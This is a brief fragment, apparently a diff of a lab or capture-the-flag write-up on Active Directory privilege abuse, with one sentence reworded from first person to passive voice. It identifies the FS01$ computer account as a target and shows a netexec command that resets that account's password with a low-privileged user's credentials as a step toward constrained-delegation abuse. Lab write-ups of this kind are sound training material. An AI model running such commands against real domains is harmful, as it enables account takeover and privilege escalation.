Skip to main content

 LDAP 10.129.234.50 389 DC FS01$

 FS01$ looks like the ideal target.
-Since Helen Frost has the ACL rights to change computer passwords, I can reset FS01$’s password and then configure it for constrained delegation.
+Since Helen Frost has the ACL rights to change computer passwords, FS01$’s password can be reset and the account configured for constrained delegation.

 elliot@exegol:~$ nxc smb redelegate.vl -u Helen.Frost -p 'Elliot1234!' -M change-password -o USER='FS01$' NEWPASS='Elliot1234!'